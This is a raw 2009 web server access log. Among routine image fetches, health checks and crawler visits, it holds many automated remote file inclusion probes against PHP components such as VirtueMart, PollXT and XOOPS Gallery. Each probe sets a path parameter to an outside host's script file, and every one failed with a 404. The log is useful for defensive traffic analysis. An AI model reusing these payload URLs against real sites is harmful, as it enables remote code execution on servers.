63.249.159.4 - - [23/Sep/2009:06:23:02 -0400] "GET /logs//allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 235 "-" "-"
209.59.12.99 - - [23/Sep/2009:06:23:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.100.5.136 - - [23/Sep/2009:06:23:14 -0400] "GET //Neos_Chronos/header.php?base_folder=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:23:14 -0400] "GET /logs//Neos_Chronos/header.php?base_folder=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:23:15 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:23:17 -0400] "GET /logs/access_log.Q109082600%20%20//Neos_Chronos/header.php?base_folder=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:23:20 -0400] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:23:23 -0400] "GET /logs/access_log.Q109090600%20%20//Neos_Chronos/header.php?base_folder=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.221.88.162 - - [23/Sep/2009:06:23:36 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:06:23:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:06:23:36 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:06:23:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.152.199.34 - - [23/Sep/2009:06:24:40 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:24:40 -0400] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:25:08 -0400] "GET //include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:25:08 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:25:08 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:25:08 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:06:25:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:25:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:25:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
122.155.5.84 - - [23/Sep/2009:06:25:39 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:25:49 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:06:26:06 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:06:26:06 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:06:26:06 -0400] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:06:26:13 -0400] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootP=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:06:27:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:27:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:27:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [23/Sep/2009:06:28:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.155.5.84 - - [23/Sep/2009:06:28:19 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:28:19 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:06:29:53 -0400] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:06:29:58 -0400] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:06:30:05 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:30:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:30:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
205.188.116.70 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/pf-a.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.71 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/cat_link.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.117.78 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/space.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.20 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/cat_dot.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.71 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/pf-b.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.142 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/items/3105205_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.137 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/items/0011306_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.196 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/items/1151265_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.137 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/items/4002005_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.206 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/cat_collapse.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.138 - - [23/Sep/2009:06:30:53 -0400] "HEAD /images/cat_expand.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5007; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [23/Sep/2009:06:33:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.155.5.84 - - [23/Sep/2009:06:35:20 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:06:35:20 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.222.40.206 - - [23/Sep/2009:06:37:23 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.222.40.206 - - [23/Sep/2009:06:37:23 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:06:38:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.136.37.141 - - [23/Sep/2009:06:43:06 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.136.37.141 - - [23/Sep/2009:06:43:06 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
94.136.37.141 - - [23/Sep/2009:06:43:06 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:06:43:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.9.63.18 - - [23/Sep/2009:06:44:54 -0400] "GET /logs//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
81.9.63.18 - - [23/Sep/2009:06:44:54 -0400] "GET /logs/access_log.Q109082800%20%20//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.9.63.18 - - [23/Sep/2009:06:44:55 -0400] "GET //ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
81.9.63.18 - - [23/Sep/2009:06:44:55 -0400] "GET /logs/access_log.Q109082900%20%20//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.9.63.18 - - [23/Sep/2009:06:45:38 -0400] "GET /logs/access_log.Q109082900//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.9.63.18 - - [23/Sep/2009:06:45:38 -0400] "GET /logs/access_log.Q109082800//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:48:11 -0400] "GET //ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:48:11 -0400] "GET /logs//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:48:11 -0400] "GET /logs/access_log.Q109082800%20%20//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:48:11 -0400] "GET /logs/access_log.Q109082900%20%20//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:06:48:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.222.40.169 - - [23/Sep/2009:06:48:31 -0400] "GET /logs/access_log.Q109082800//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:48:31 -0400] "GET /logs/access_log.Q109082900//ammember///?_SERVER[DOCUMENT_ROOT]=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.175.8.234 - - [23/Sep/2009:06:49:34 -0400] "GET /logs/access_log.Q109062700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hanamekch.com/bbs/data/homeschool/donid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
217.118.24.159 - - [23/Sep/2009:06:49:46 -0400] "GET /logs/access_log.Q109062700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.q-fashion.com/picture/donid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
81.19.69.149 - - [23/Sep/2009:06:50:00 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:50:00 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:50:00 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:50:01 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:50:01 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:50:01 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:50:13 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:06:50:14 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.175.8.234 - - [23/Sep/2009:06:50:56 -0400] "GET /logs/access_log.Q109061000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hanamekch.com/bbs/data/homeschool/donid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
217.118.24.159 - - [23/Sep/2009:06:51:07 -0400] "GET /logs/access_log.Q109061000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.q-fashion.com/picture/donid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
172.16.1.180 - - [23/Sep/2009:06:51:07 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:51:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:51:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:52:11 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:52:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:52:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [23/Sep/2009:06:53:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [23/Sep/2009:06:54:53 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:54:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:54:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
61.100.5.136 - - [23/Sep/2009:06:55:56 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:55:56 -0400] "GET /logs/access_log.Q109080400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:55:56 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.175.8.234 - - [23/Sep/2009:06:55:58 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hanamekch.com/bbs/data/homeschool/donid.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.831"
61.100.5.136 - - [23/Sep/2009:06:55:58 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:55:58 -0400] "GET /logs/access_log.Q109080400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:55:58 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:56:04 -0400] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:06:56:10 -0400] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.30.142.250 - - [23/Sep/2009:06:56:17 -0400] "GET /logs/access_log.Q109091400 HTTP/1.0" 200 5910903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.72.216 - - [23/Sep/2009:06:57:51 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:57:51 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:57:52 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
209.59.12.99 - - [23/Sep/2009:06:58:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [23/Sep/2009:06:58:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:58:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:06:58:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.115.89.7 - - [23/Sep/2009:06:58:37 -0400] "GET //stphpbtnimage.php?STPHPLIB_DIR=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:58:37 -0400] "GET /logs/access_log.Q109082600%20%20//stphpbtnimage.php?STPHPLIB_DIR=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:58:38 -0400] "GET /logs//stphpbtnimage.php?STPHPLIB_DIR=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:58:52 -0400] "GET //stphpbtnimage.php?STPHPLIB_DIR=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:58:52 -0400] "GET /logs//stphpbtnimage.php?STPHPLIB_DIR=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:58:52 -0400] "GET /logs/access_log.Q109082600%20%20//stphpbtnimage.php?STPHPLIB_DIR=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:06:58:56 -0400] "GET /logs/access_log.Q109082600//stphpbtnimage.php?STPHPLIB_DIR=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:06:59:26 -0400] "GET /logs/access_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:26 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
